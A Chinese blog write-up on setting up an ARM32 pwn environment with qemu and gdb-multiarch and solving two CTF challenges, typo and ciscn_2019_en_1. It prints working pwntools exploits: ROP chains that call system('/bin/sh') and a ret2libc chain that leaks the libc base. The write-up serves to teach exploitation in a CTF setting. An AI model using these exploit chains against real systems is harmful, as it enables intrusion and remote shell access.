arm-Pwn环境搭建+简单题目

已于 2024-08-25 16:21:58 修改
阅读量877 收藏 29
点赞数 16
分类专栏: Pwn pwn题目记录 文章标签: arm linux
于 2024-08-25 16:16:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ULGANOY/article/details/141529731
版权

前言

起因是看到一篇IOT CVE的分析文章。

正好也在学pwn,arm架构的也是IOT这些固件最常用的,所以先安一个arm-pwn的环境。

环境搭建/调试

1. 安装 gdb-multiarch

sudo apt-get install gdb-multiarch

2. 安装qemu

ctf的arm_pwn只需要安装qemu-user就行了。

binfmt*是用来识别文件类型

sudo apt-get install qemu-user
sudo apt-get install qemu-user-binfmt
sudo apt-get install "binfmt*"

只用这两步就可以直接运行静态链接的arm程序。
jarvisoj typo为例
在这里插入图片描述

3. 动态链接的arm程序配置

查找:

apt search  "libc6-" | grep 'arm'

在这里插入图片描述
可以根据需要安装不同架构的库
对于arm32就是这个

sudo apt-get install libc6-armel-cross

4. 运行方式

-L 指定运行库,-g 指定端口

qemu-arm -L /usr/arm-linux-gnueabi ./cisn_en_1

在这里插入图片描述

5. 动态调试

安装过程问题不大,记录下调试。
这里没用pwntools,先用gdb端口来看:

gdb-multiarch
set architecture arm
target remote localhost:23333

image

然后另一个终端运行待调试程序
以静态链接的typo为例:
不需要-L指定动态链接库,-g指定端口。

qemu-arm -g 23333 ./typo

image

image

pwntools调试

如果用py脚本调试,就加上这句:

p = process(['qemu-arm', '-L', '/usr/arm-linux-gnueabi','-g','23333', 'ciscn_en_1'])

然后一样的gdb-multiarch设置好

target remote localhost:23333

再运行python即可调试。

两道题目

拿两道arm32的题来熟悉一下。

javisoj-typo

题目链接
对于arm指令集,以前我一直认为下载的IDA是无法F5的。。。
结果
image

也就是只要ROM、RAM这些位置加载对了(ctf的pwn题的话一般不用自己找基址。。),IDA就能F5。。。
(当然要全插件版的IDA)

回到题目。
第一个arm_pwn

程序静态链接,无PIE,无canary。
在这里插入图片描述

直接rop system(“/bin/sh”)

注意下要先恢复符号,不然不一定找得到system。
image

image

主要就是对于arm指令集要稍微熟悉一点,知道r0和amd64的rdi是用于第一个参数传参就行。
然后arm指令集是由pop pc这种来控制指令流的。
填充完缓冲区后不需要覆盖"old_ebp"。

Exp:
image

binsh = 0x0006C384
system = 0x110B4
# 0x00020904 : pop {r0, r4, pc}
r0_r4_pc = 0x00020904

pl = b'a'*112 + p32(r0_r4_pc) + p32(binsh) + p32(0) + p32(system)

sa("quit\n",b"\n")
sleep(0.3)
sl(pl)

p.interactive()

ciscn_2019_en_1

题目链接

在这里插入图片描述
动态链接,无PIE。

IDA看程序,在这里插入图片描述
很明显的一个栈溢出。我们尝试ret2libc。
首先要寻找gadget。
而这里是找不到pop r0的,这也是本题的难点所在。

但我们可以通过这个地方的gadget来间接控制r0:
在这里插入图片描述

跟ret2csu很类似,我们首先传入POP {R4-R10,PC}的gadget,
这样我们就能控制R7,R3寄存器的值。
然后PC寄存器填上MOV R0.R7,也就是上面那个gadget的地址。
这样我们就能通过R7控制R0,通过R3控制BLX执行的函数了。

只是还有个问题,那个POP {R4-R10}其实没有R3。。
但我们可以找一个R3的gadget,比如

0x000103a4 : pop {r3, pc}

来赋值R3,并且控制指令流。

具体到ret2libc流程来说,

R7 = puts_got
PC = pop_r3_pc
R3 = puts_plt
PC = mov_r0_r7

就可以打印出puts的地址了。

泄露libc后就正常再打一遍system("/bin/sh")即可。
只是这里注意,我们不能像正常的ret2csu那样控制puts(puts_got)后返回的地址。。
所以打印完后程序会直接退出。

当然本地两次开process它们的基址是不变的,所以我们再process一个来getshell即可。

本地

Exp:

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
vuln = 0x10590
pop_r3_pc = 0x000103a4
pop_r4_pc = 0x000104f8
pop_45678bl_pc = 0x00010638  # 
mov_r0r7_blxr3 = 0x00010628  # r7 -> r0


# puts_plt(puts_got)
pl = b'a'*0x24 + p32(pop_45678bl_pc)
pl += p32(0)*3 + p32(puts_got) # r7
pl += p32(0)*3 + p32(pop_r3_pc) # pc
pl += p32(puts_plt) # r3
pl += p32(mov_r0r7_blxr3) # pc


ru("name:\n\n")
#pause()
sl(pl)

ru('\n')
leak = u32(p.recv(4))
info_addr("puts_addr",leak)
libcbase = leak - libc.sym['puts']
info_addr("libcbase",libcbase)
system = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search("/bin/sh\x00"))

# getshell
p = process(['qemu-arm','-L', '/usr/arm-linux-gnueabi', 'ciscn_en_1'])
pl = b'a'*0x24 + p32(pop_45678bl_pc)
pl += p32(0)*3 + p32(binsh) # r7
pl += p32(0)*3 + p32(pop_r3_pc) # pc
pl += p32(system) # r3
pl += p32(mov_r0r7_blxr3) # pc
ru("name:\n\n")
pause()
sl(pl)


p.interactive()

在这里插入图片描述

远程

打远程的话就不能这么开两次process
所以对于那个类csu gadget利用顺序就要改一改了。
核心就是改顺序使得能控制puts(puts_got)后的返回地址。

顺序改为:

padding
POP {R3,PC}
puts_plt # R3
POP {R4-R10,PC} # PC
p32(0)*3
puts_got # R7
p32(0)*3
MOV R0, R7 # PC

到这里的话就是第一遍gadget,类似csu的gadget1->gadget2
然后再次"滑"到gadget1的POP {R4-R10,PC}
我们就可以控制PC了。

p32(0)*7
vuln_addr # PC

然后就是buu远程给的libc奇奇怪怪的。。。 好多偏移都不大对。。
自己调整一下,
两个地方:

puts_got = 0x21010
libcbase = leak - 0x00047b30

远程的Exp:

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
vuln = 0x10590
pop_r3_pc = 0x000103a4
pop_r4_pc = 0x000104f8
pop_45678bl_pc = 0x00010638  # 
mov_r0r7_blxr3 = 0x00010628  # r7 -> r0

info_addr("plt",puts_plt)
info_addr("got",puts_got)
# puts_plt(puts_got)
pl = b'a'*0x24 + p32(pop_r3_pc)
pl += p32(puts_plt) + p32(pop_45678bl_pc)
pl += p32(0)*3 + p32(0x21010)
pl += p32(0)*3 + p32(mov_r0r7_blxr3)
pl += p32(0)*7
pl += p32(vuln) # pc

ru("name:\n\n")
#pause()
sl(pl)

ru('\n')
leak = u32(p.recv(4))
info_addr("puts_addr",leak)
libcbase = leak - 0x00047b30
info_addr("libcbase",libcbase)
system = libcbase + libc.sym['system']
binsh = libcbase + next(libc.search("/bin/sh\x00"))

# getshell
pl = b'a'*0x24 + p32(pop_45678bl_pc)
pl += p32(0)*3 + p32(binsh) # r7
pl += p32(0)*3 + p32(pop_r3_pc) # pc
pl += p32(system) # r3
pl += p32(mov_r0r7_blxr3) # pc
ru("name:\n\n")
pause()
sl(pl)


p.interactive()

在这里插入图片描述

N0zoM1z0
关注
专栏目录
arm pwn 初探
qq_36495104的博客
06-27 536
学习网站azeria-labs,这个网站里蛮多arm教程,有基础的arm汇编,还有arm exploit,还有如何使用ubuntu 构建树莓派虚拟机。 如何搭建arm pwn环境和下面要讲的如何利用arm pwn参考这篇文章 ARM64 调试环境搭建及 ROP 实战 题目地址 pwn 环境搭建 可以使用 apt 安装 arm 的动态库,然后用 qemu 运行,也可以安装一个树莓派虚拟机,做题直接参考先知的那篇文章,最简单 安装树莓派虚拟机 直接下载现成的 azeria-labs提供了装有树莓派虚拟机的ubu
Xman2018冬令营选拔赛arm-pwn
Peanuts
01-05 867
arm32-pwn环境搭建到实战 关于armpwn还是比较令人头疼的,首先汇编比较难看懂,其次就是ida反编译出来的东西还会有错误,比如之后要讲的题目中栈的分布就和ida解析出来的完全不一样。那么先来看一看环境的搭建。之前有人发过完整的64的环境搭建,32的环境搭建和实战还是有一些不同的 环境搭建 环境的搭建应该是现在arm题目中比较麻烦的一个点。 安装qemu apt-get in...
2022CTF培训(九)MIPS PWN环境搭建&MIPS PWN入门
sky123博客
12-22 2026
mips pwn
ARM PWN
tbsqigongzi的博客
08-12 314
arm pwn
ARM pwn 入门 (1)
CoLin的pwn小屋
11-02 1268
ARM pwn 入门(1) —— 前置知识
Arm pwn学习
蚁景网安学院
08-07 629
刚刚开始学习ARM pwn,下面如有错误,希望各位大佬多多包han,多多包涵。先介绍下 Arm的一些常见指令那就先来Arm 三操作数指令LDRBR0,[R1,#-1]#...
ARM pwn 入门 (3)
CoLin的pwn小屋
11-06 1128
ARM pwn 入门 (3)——ROP emporium 第1-2题
ARM pwn 入门 (2)
CoLin的pwn小屋
11-02 1298
ARM pwn 入门 (2) —— 第一道ARM pwn
CTF pwn -- ARM架构的pwn题详解
lifanxin的博客
05-14 3000
arm架构的pwn题详解概述环境搭建使用QEMU使用gdb-multiarchARM架构基本知识一道例题参考博客总结 概述   ARM架构过去称作进阶精简指令集机器(Advanced RISC Machine,更早称作:Acorn RISC Machine),是一个32位精简指令集(RISC)处理器架构,其广泛地使用在许多嵌入式系统设计。由于节能的特点,ARM处理器非常适用于移动通讯领域,符合其主要设计目标为低耗电的特性。因此我们常用的手机、平板等移动设备都是采用ARM体系架构的,因此CTF中不可避免也会出
Nov 26, 21在macOS 12.0.1上布置pwn环境
eeeeeight的博客
11-27 1836
前言: 不是让民那桑在mac上做amd架构的题目,我布置环境是为了以后方便pwn arm架构的题目/设备之类的(逃) Pwn environment: lldb && voltron && tmuxinator && pwntools: Because outstanding performance of Plugins in gdb like pwndbg, gef and so on. I choose to install gdb on my M1 Ma
Qemu搭建arm解题小练习
weixin_44222568的博客
05-17 707
晕头转向,不知所云
ARM PWN基础教程
蚁景网安学院
07-19 650
在CTF比赛中,我们所能接触到的大部分都是x86 x86_64架构的题目,而在我开始接触IOT方向的研究以后发现智能设备所用到的则是ARM和MIPS架构为主。本篇文章在介绍前置知识的基础上通过CTF的ARM架构类型题带读者更好的入门ARM PWN的世界。.........
ArmPwn学习
qq_40712959的博客
04-20 794
arm pwn练习 inctf2018_wARMup 程序逻辑 明显的栈溢出,但是只溢出了0x10个字节,很明显,需要栈迁移,但是在程序中,注意其调用read函数的汇编代码,如下,写如数据的缓冲区buf由R3寄存器重置,故若我们可以控制R3寄存器,则可以控制程序输入的位置,这里通过gadget(0x00010364 : pop {r3, pc})实现。 注意程序的endlog,如下图,可以发现,程序的SP由R11寄存器控制,而由于栈溢出漏洞的存在,我们可以控制R11,故我们可以通过控制R11,将其指向b
ubuntu20.04 PWN(含x86、ARM、MIPS)环境搭建
热门推荐
hollk’s blog
06-25 3万+
最近在ubuntu20.04中重装了一遍PWN的环境,顺带着安装了ARM和MIPS的交叉编译及运行环境。装的时候也是摸着石头过河,好在拍了很多快照,即使装错了也没有关系,下面是已装的工具列表:
PowerPC&ARM架构下的pwn 初探
S4n_v1的博客
04-13 928
PowerPC&ARM&AARCH64 架构学习(Ubuntu16 + 运行环境搭建 + 调试 + 指令集 + 赛题复现 2023 数字中国创新大赛 数字网络安全人才挑战赛 - pwn起源 buu - jarvisoj_typo
ARM pwn 环境搭建和使用
qq_60209620的博客
03-30 413
qemu是一款可执行硬件虚拟化的虚拟机,与他类似的还有Bochs、PearPC,之前我们已经安装完了gdb-multiarch,现在来试试怎么调试程序。这个文件夹,该文件夹即对应刚安装好的arm32位libc库.到这里了,我们就能直接运行静态链接arm的程序了,拿的。但qemu具有高速(配合KVM)、跨平台的特性。例子:调试32位的静态程序。但是这里我们只用下载。
探索ARM平台漏洞利用:ARMPwn项目详解
最新发布
gitblog_00036的博客
05-08 431
探索ARM平台漏洞利用:ARMPwn项目详解 armpwn Repository to train/learn memory corruption on the ARM platform. 项目地址: https://gitcode.com/gh_mirrors/...
armpwn环境搭建
qq_51474381的博客
05-02 343
ubantu安装报错太多,直接用deepin最新版搭建,十分顺利。 1.准备git,gdb 和 gdb-multiarch sudo apt-get update sudo apt-get install git gdb gdb-multiarch 2.安装 gdb 的插件 pwndbg git clone https://github.com/pwndbg/pwndbg cd pwndbg ./setup.sh 3.安装pwntools(可能要先安装pip) sudo pip insta
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值